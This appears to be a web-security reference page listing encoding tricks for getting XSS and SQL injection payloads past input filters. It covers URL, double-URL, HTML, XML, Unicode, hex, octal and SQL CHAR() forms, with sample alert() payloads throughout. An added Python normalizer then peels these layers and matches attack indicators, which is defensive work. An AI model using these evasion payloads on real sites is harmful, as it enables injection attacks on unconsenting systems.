Obfuscation

URL encoding:

[...]/?search=Fish+%26+Chips

Double URL encoding:

[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E

HTML encoding:

<img src=x onerror="&#x61;lert(1)">
<a href="javascript&#00000000000058;alert(1)">Click me</a>

XML encoding:

<stockCheck>
    <productId>
        123
    </productId>
    <storeId>
        999 &#x53;ELECT * FROM information_schema.tables
    </storeId>
</stockCheck>

Unicode encoding:

eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>

Hex escaping:

eval("\x61lert")

Octal escaping:

eval("\141lert(1)")

Multiple encodings:

<a href="javascript:&bsol;u0061lert(1)">Click me</a>

The browser first HTML-decodes &bsol; to \, which turns u0061 into the Unicode escape \u0061, which in turn decodes to a.

SQL char() function:

CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)

Decodes to SELECT.
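Every technique on this page defeats a filter that matches the raw input only once. The detection-side counterpart is to peel the layers until the value stops changing and match on the normalized text. The following is an added example, not code from the original page: a small normalizer that applies URL decoding (with the query-string "+" rule at the outermost layer only), HTML/XML entity decoding, JavaScript \u{...}, \uXXXX, \xXX and octal escapes, and SQL CHAR() concatenation, records which layers were removed, and then checks indicators against the result. The decoder and indicator names, the from_query_string parameter and the sample inputs are constructed for this example; it also accepts || between CHAR() calls, which goes beyond the + shown above.

```python
"""Added example: peel the encoding layers listed on this page from an input until it
stops changing, then match plain-text indicators against the normalized text.
Layer names, indicator names and samples are constructed for this example."""
import html
import re
from urllib.parse import unquote, unquote_plus

# JavaScript string escapes: \u{...}, \uXXXX, \xXX and octal \NNN
_JS_ESCAPE = re.compile(
    r"\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})"
)
# Runs of CHAR(n) joined with + (as on the page) or || (ANSI concatenation)
_SQL_CHAR_RUN = re.compile(
    r"CHAR\(\d{1,3}\)(?:\s*(?:\+|\|\|)\s*CHAR\(\d{1,3}\))*", re.IGNORECASE
)
# Indicators are checked on the normalized text, not only on the raw input
INDICATORS = {
    "img_tag": re.compile(r"<img\b", re.I),
    "onerror": re.compile(r"onerror\s*=", re.I),
    "js_url": re.compile(r"javascript\s*:", re.I),
    "select": re.compile(r"\bselect\b", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
}


def js_unescape(text):
    """Resolve JavaScript character escapes; out-of-range code points are left alone."""
    def repl(m):
        brace, u4, x2, octal = m.groups()
        code = int(octal, 8) if octal is not None else int(brace or u4 or x2, 16)
        try:
            return chr(code)
        except ValueError:  # above U+10FFFF, e.g. \u{110000}
            return m.group(0)
    return _JS_ESCAPE.sub(repl, text)


def sql_char_decode(text):
    """Replace CHAR(83)+CHAR(69)+... runs with the literal they build."""
    def repl(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d{1,3}", m.group(0)))
    return _SQL_CHAR_RUN.sub(repl, text)


DECODERS = (
    ("url", unquote),            # percent-escapes only; repeated rounds handle double encoding
    ("html", html.unescape),     # &#x61; &#00000000000058; &bsol; and friends (also XML numeric refs)
    ("js", js_unescape),
    ("sqlchar", sql_char_decode),
)


def normalize(value, from_query_string=False, max_rounds=8):
    """Apply the decoders repeatedly until the value stops changing.
    Returns (text, layers); layers lists each decoder that changed something, in
    order, so len(layers) is the number of encoding layers that were peeled."""
    layers, text = [], value
    if from_query_string:  # '+' means space only at the outermost query-string layer
        decoded = unquote_plus(text)
        if decoded != text:
            layers.append("url+form")
            text = decoded
    for _ in range(max_rounds):
        before = text
        for name, fn in DECODERS:
            decoded = fn(text)
            if decoded != text:
                layers.append(name)
                text = decoded
        if text == before:
            break
    return text, layers


def inspect_input(value, from_query_string=False):
    """Normalize, then report which indicators fire on the raw and the normalized text."""
    text, layers = normalize(value, from_query_string)
    return {
        "normalized": text,
        "layers": layers,
        "raw_hits": sorted(n for n, rx in INDICATORS.items() if rx.search(value)),
        "hits": sorted(n for n, rx in INDICATORS.items() if rx.search(text)),
    }


if __name__ == "__main__":
    SAMPLES = [  # constructed from the examples on this page; True = came from a query string
        ("Fish+%26+Chips", True),
        ("%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E", True),
        ('<img src=x onerror="&#x61;lert(1)">', False),
        ('<a href="javascript&#00000000000058;alert(1)">Click me</a>', False),
        ("999 &#x53;ELECT * FROM information_schema.tables", False),
        (r'<a href="javascript\u{0000000003a}alert(1)">Click me</a>', False),
        (r'eval("\141lert(1)")', False),
        ('<a href="javascript:&bsol;u0061lert(1)">Click me</a>', False),
        ("CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)", False),
    ]
    for raw, qs in SAMPLES:
        r = inspect_input(raw, qs)
        print(f"{raw!r}\n  -> {r['normalized']!r} layers={r['layers']} "
              f"raw_hits={r['raw_hits']} hits={r['hits']}")
```

The double-URL-encoded img payload is the instructive case: no indicator fires on the raw value, two "url" layers come off, and img_tag and onerror fire on the result. The layer count itself is a useful signal, since legitimate input is rarely encoded more than once, and the from_query_string switch matters because treating + as a space anywhere but the outermost layer would corrupt a CHAR(83)+CHAR(69) run before the SQL decoder sees it.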
